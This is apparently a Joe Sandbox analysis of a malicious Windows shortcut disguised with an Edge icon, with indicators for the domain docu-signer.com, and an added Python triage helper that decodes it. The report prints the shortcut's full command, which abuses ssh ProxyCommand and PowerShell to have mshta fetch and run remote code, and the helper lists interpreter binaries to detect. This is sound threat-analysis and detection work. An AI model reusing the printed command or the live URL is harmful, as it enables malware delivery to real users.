https://docu-signer.com/api/uz/0912545164/index.mp4p | powershell.exe, 00000004.00000002.1462404136.000002A83B9A1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637$fE | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4y | mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4x | mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637z | mshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637ent( | mshta.exe, 00000005.00000002.2676736474.00000178AC53C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000007.00000003.1483836146.0000025E2B360000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.dr | false | | high
http://crl.ver) | svchost.exe, 00000007.00000002.2680213004.0000025E2B610000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.cloudflare.com/5xx-error-landing | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd | ssh.exe, 00000001.00000002.2676527197.000002931A8C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, DypA6KbLrn.lnk | true | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/phish-bypass | mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4R | mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://g.live.com/odclientsettings/Prod1C: | edb.log.7.dr | false | | high
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637a | mshta.exe, 00000005.00000002.2682717479.00000180B392C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637fn | mshta.exe, 00000005.00000002.2676736474.00000178AC522000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4c | powershell.exe, 00000004.00000002.1464783976.000002A853C50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...o | mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/phish-bypassQ | mshta.exe, 00000005.00000002.2680532869.00000180AF0EA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637m | mshta.exe, 00000005.00000002.2676736474.00000178AC557000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1462404136.000002A83B9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1462404136.000002A83BA01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...x | mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637rg | mshta.exe, 00000005.00000002.2680532869.00000180AF129000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/ | mshta.exe, 00000005.00000002.2676736474.00000178AC599000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docu-signer.com/api/uz/0912545164/index.mp4h | mshta.exe, 00000005.00000002.2676736474.00000178AC506000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docu-signer.com/api/uz/0912545164/index.mp4f | mshta.exe, 00000005.00000002.2680532869.00000180AF097000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://docu-signer.com/cdn-cgi/images/icon-exclamation.png?1376755637...u | mshta.exe, 00000005.00000002.2680532869.00000180AF070000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.87.65 | docu-signer.com | United States | 13335 | CLOUDFLARENETUS | true
                              IP
                              127.0.0.1
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1582824
                              Start date and time:2024-12-31 15:40:29 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 43s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:DypA6KbLrn.lnk
                              renamed because original name is a hash value
                              Original Sample Name:25e7cee7a15413a5171636165e0e0473.lnk
                              Detection:MAL
                              Classification:mal80.winLNK@9/11@1/2
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 5
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Found application associated with file extension: .lnk
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 184.28.90.27, 52.149.20.212
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target mshta.exe, PID 7764 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 7684 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: DypA6KbLrn.lnk
Time | Type | Description
09:41:50 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:41:50 | API Interceptor | 1x Sleep call for process: mshta.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.87.65 | payload_1.hta | malicious | RedLine |
| SFHgtxFGtB.ps1 | malicious | Unknown |
| fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
docu-signer.com | payload_1.hta | malicious | RedLine | 104.21.87.65
| SFHgtxFGtB.ps1 | malicious | Unknown | 104.21.87.65
| fsg5PWtTm2.lnk | malicious | RedLine, SectopRAT | 104.21.87.65
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://br.custmercompa.de/ | malicious | Unknown | 172.67.139.222
| tyPafmiT0t.exe | malicious | 44Caliber Stealer, BlackGuard, Rags Stealer | 188.114.96.3
| vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 104.21.85.189
| Invoice-BL. Payment TT $ 28,945.99.exe | malicious | AsyncRAT, StormKitty, WorldWind Stealer | 172.67.196.114
| Statement of Account - USD 16,720.00.exe | malicious | AgentTesla | 104.26.12.205
| MJhe4xWsnR.msi | malicious | Unknown | 162.159.61.3
| MJhe4xWsnR.msi | malicious | Unknown | 172.64.41.3
| 5EfYBe3nch.exe | malicious | LummaC, Amadey, Babadeda, LiteHTTP Bot, LummaC Stealer, Poverty Stealer, Stealc | 104.21.96.1
| zhMQ0hNEmb.exe | malicious | LummaC | 104.21.112.1
| 2RxMkSAgZ8.exe | malicious | LummaC | 104.21.64.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | HngJMpDqxP.lnk | malicious | Unknown | 104.21.87.65
| setup.msi | malicious | Unknown | 104.21.87.65
| GYede3Gwn0.lnk | malicious | Unknown | 104.21.87.65
| 6684V5n83w.exe | malicious | Vidar | 104.21.87.65
| heteronymous.vbs | malicious | Remcos, GuLoader | 104.21.87.65
| zku4YyCG6L.exe | malicious | Unknown | 104.21.87.65
| hca5qDUYZH.exe | malicious | Unknown | 104.21.87.65
| Loader.exe | malicious | Meduza Stealer | 104.21.87.65
| setup.msi | malicious | Unknown | 104.21.87.65
| BHgwhz3lGN.exe | malicious | Vidar | 104.21.87.65
                                    No context
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7067238271017605
                                    Encrypted:false
                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqG:2JIB/wUKUKQncEmYRTwh0y
                                    MD5:DCF899FFF7B72EBB6EB5806D330D2C3C
                                    SHA1:1745114D3D4643AC01C32B7B875984BAE2046AA5
                                    SHA-256:787AA56467E9A7D39BC552F411AC17C2E63CDF604AA8378A95EA577137109D39
                                    SHA-512:982D443926E73BC31792584C11BB6DA4E117DC24709CA2834E3B6C749C800CA3E1CB955E65BF6E37033B9F7724ADF22F3B5A29D7F860911176A4251C41A07352
                                    Malicious:false
                                    Reputation:low
                                    Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x1eaa2214, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.790044261279129
                                    Encrypted:false
                                    SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                    MD5:B22A09433F2DDB7E2C69FF462824A1AB
                                    SHA1:81E38A11F3882928BE405E7DA594957E5BF9C3A3
                                    SHA-256:C1259A631ED9193D386E544D0EE626DDEA13C66E32910DFC5A055EF96623DEED
                                    SHA-512:823FFACCAC39E746ADF15E8DC90A80C77AD780B50C555627098C9FFEE6F50340E792473566AF4CFBAE6EA8B2AE392B46EA63FB964310135D65B0BECD8329B476
                                    Malicious:false
                                    Reputation:low
                                    Preview:..".... ...............X\...;...{......................0.`.....42...{5.2)...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................0r2)...|.....................~2)...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08223264547788528
                                    Encrypted:false
                                    SSDEEP:3:6iWlllKYeg071t/57Dek3Jiaq6CDlAllEqW3l/TjzzQ/t:6NlllKz/7HR3tiL55Amd8/
                                    MD5:7E1FAE2EB810788DA73D33149E1144F6
                                    SHA1:08D23C6AC2932FB8ED4D6066B7999FCE0686A9A7
                                    SHA-256:C057227BF35871356DF799678DCB5AC1C0B6579B345614956DD61494900864C8
                                    SHA-512:2635FA00848354D8942B8D609D465576BE29242480C00D1006A34AA9DB785DB584D9AFEA314B3031409CA4C2555B853E47B57017567BD4E4C10A525E715055E6
                                    Malicious:false
                                    Reputation:low
                                    Preview:.........................................;...{..2)...|..42...{5.........42...{5.42...{5...Y.42...{59...................~2)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:ASCII text, with very long lines (24050)
                                    Category:dropped
                                    Size (bytes):24051
                                    Entropy (8bit):4.941039417164537
                                    Encrypted:false
                                    SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                    MD5:5E8C69A459A691B5D1B9BE442332C87D
                                    SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                    SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                    SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):452
                                    Entropy (8bit):7.0936408308765495
                                    Encrypted:false
                                    SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                    MD5:C33DE66281E933259772399D10A6AFE8
                                    SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                    SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                    SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                    Malicious:false
                                    Preview:.PNG........IHDR...6...6............3PLTE.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?.E?..".....tRNS.@0.`........ P.p`...../IDATx.....0...l..6....+...~yJ.F"....oE..L.3..[..i2..n.WyJ..z&.....F.......b....p~...|:t5.m...fp.i./e....%.%...n.P...enV.....!...,.......E........t![HW.B.g.R.\^.e..o+........%.&-j..q...f@..o...]... ....u0.x..2K.+C..8.U.L.Y.[=.....y...o.tF..]M..U.,4..........a.>/.)....C3gNI.i...R.=....Q7..K......IEND.B`.
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.773832331134527
                                    Encrypted:false
                                    SSDEEP:3:Nlllulqllll/:NllUql/
                                    MD5:49FAEE31B2AE8B15DA007BA9D5577E99
                                    SHA1:DE0C238EAED882225C0057884A0524C60CBBF35D
                                    SHA-256:518A64E432AF799C48413F1EBDB4249F810C00BAE3ADD0C0CC34BDA3AF9B6C81
                                    SHA-512:324B7C72B7598A81BACDE122AF35CD72BB4CEAE2A43A03F11D7DB5D570BAA88DF7811F3E451285537CE6F770C21DE3392DBBB10CFD9A29CD30D4BE88DA6275DE
                                    Malicious:false
                                    Preview:@...e...........................................................
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
                                    Entropy (8bit):3.1071405136166086
                                    TrID:
                                    • Windows Shortcut (20020/1) 100.00%
                                    File name:DypA6KbLrn.lnk
                                    File size:2'702 bytes
                                    MD5:25e7cee7a15413a5171636165e0e0473
                                    SHA1:abace591e3418a1b64cc38f37851b7b4da7347cf
                                    SHA256:4ae7c304075927398c65e980aa93f181d18dcf52265f6acc82e530d46ffc7ba4
                                    SHA512:bee3edd9fbcce29a7b48700c9cff07b63ee9e81ca7701ff65c5558bb114f9a561df64aa55b8fffff081bfba8355fa248b2b0536b0aee81e0e43e80ac0c92b2fa
                                    SSDEEP:24:8V/BF//ZrQ9HYWGt1v+/+G6AWbUk20xZvmyw5LkddpBpB19dsHhWUIeFIU:8FLZrCCG6AaUk1uywVkdbBpB19Z5W
                                    TLSH:085157103AE90B14F7B34B349476A320C57BBC06EDB14B1E004D51886B67A55E5B5F7F
                                    File Content Preview:L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                    Icon Hash:72d282828e8d8dd5

                                    General

                                    Relative Path:..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
                                    Command Line Argument: -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
                                    Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
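The command-line argument above is the whole payload of this shortcut. `ssh.exe` spawns whatever is in `ProxyCommand` before it attempts any connection or authentication, and the trailing `.` is only there so that ssh has a host argument and proceeds to that step; no SSH session is ever needed. The outer `powershell` evaluates the expression `'…'.SubString(13, 57)` and hands the resulting string to the inner `powershell -Command`, which runs it. The 13-character junk prefix and suffix around the real command exist to defeat naive string matching on the LNK. The following Python triage helper is an added example, not part of the Joe Sandbox report: it pulls the `ProxyCommand` value out of the recorded argument string, evaluates the `.SubString()` call with .NET semantics (zero-based start, exact length, error when out of range), and flags the recovered command when it invokes an interpreter or download-and-execute binary. The LOLBin list, the `MEDIA_EXTS` list and the function names are assumptions chosen for this example.

```python
import re
from typing import Optional

# Command-line argument exactly as recorded in the LNK header above.
LNK_ARGS = (
    '-o ProxyCommand="powershell powershell -Command '
    "'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'"
    '.SubString(13, 57)" .'
)

PROXYCMD_RE = re.compile(r'ProxyCommand="([^"]*)"', re.IGNORECASE)
# 'literal'.SubString(start[, length]) as PowerShell parses it. Single-quoted PowerShell
# strings only escape the quote itself ('' -> '), which this sample does not use.
SUBSTRING_RE = re.compile(
    r"'([^']*)'\.SubString\(\s*(\d+)\s*(?:,\s*(\d+))?\s*\)", re.IGNORECASE
)
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
# Interpreters and download/execute binaries that have no business inside an SSH
# ProxyCommand. Hypothetical triage list for this example, not a sandbox signature.
LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)(?:\.exe)?\b",
    re.IGNORECASE,
)
# Extensions a script host should never be asked to fetch; assumed list.
MEDIA_EXTS = (".mp4", ".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt")


def extract_proxy_command(args: str) -> Optional[str]:
    """Return the value of -o ProxyCommand="..." from an ssh argument string, or None."""
    m = PROXYCMD_RE.search(args)
    return m.group(1) if m else None


def resolve_substring(expr: str) -> str:
    """Replace every 'literal'.SubString(start[, length]) with the string .NET would return.

    String.Substring is zero-based and throws ArgumentOutOfRangeException when
    start > Length or start + length > Length; mirror that with ValueError so a
    mangled sample never silently decodes to the wrong command.
    """
    def repl(m):
        s, start = m.group(1), int(m.group(2))
        if m.group(3) is None:
            if start > len(s):
                raise ValueError(f"Substring({start}) beyond length {len(s)}")
            return s[start:]
        length = int(m.group(3))
        if start + length > len(s):
            raise ValueError(f"Substring({start}, {length}) beyond length {len(s)}")
        return s[start:start + length]
    return SUBSTRING_RE.sub(repl, expr)


def triage(args: str) -> dict:
    """Decode an ssh.exe argument string and flag a ProxyCommand that launches an interpreter."""
    proxy = extract_proxy_command(args)
    if proxy is None:
        return {"suspicious": False, "reason": "no ProxyCommand option"}
    decoded = resolve_substring(proxy)
    lolbins = sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(decoded)})
    urls = URL_RE.findall(decoded)
    return {
        "suspicious": bool(lolbins),
        "proxy_command": proxy,
        "decoded_command": decoded,
        "lolbins": lolbins,
        "urls": urls,
        # A script host pointed at a "media" URL: the extension is aimed at URL
        # filters, mshta executes whatever HTML/script the server actually returns.
        "media_named_urls": [u for u in urls if u.lower().endswith(MEDIA_EXTS)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(LNK_ARGS), indent=2))
```

Run against the recorded argument string, `triage()` reports the decoded command `powershell powershell -Command mshta https://docu-signer.com/api/uz/0912545164/index.mp4`, which matches the process chain and the `index.mp4` URL the sandbox observed. A legitimate bastion configuration such as `ProxyCommand="nc -X connect -x proxy:8080 %h %p"` is not flagged, so the check can sit in a hunting query over process-creation events where the image is `ssh.exe` without drowning in administrator noise.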
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 15:41:49.015028000 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.015090942 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.015160084 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.049557924 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.049591064 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.527457952 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.527575016 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.651422024 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.651453972 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.651835918 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.651905060 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.653469086 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.699340105 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755829096 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755875111 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755908012 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755930901 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755948067 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.755970001 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.755991936 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.756011963 CET | 49706 | 443 | 192.168.2.7 | 104.21.87.65
Dec 31, 2024 15:41:49.756016970 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
Dec 31, 2024 15:41:49.756026983 CET | 443 | 49706 | 104.21.87.65 | 192.168.2.7
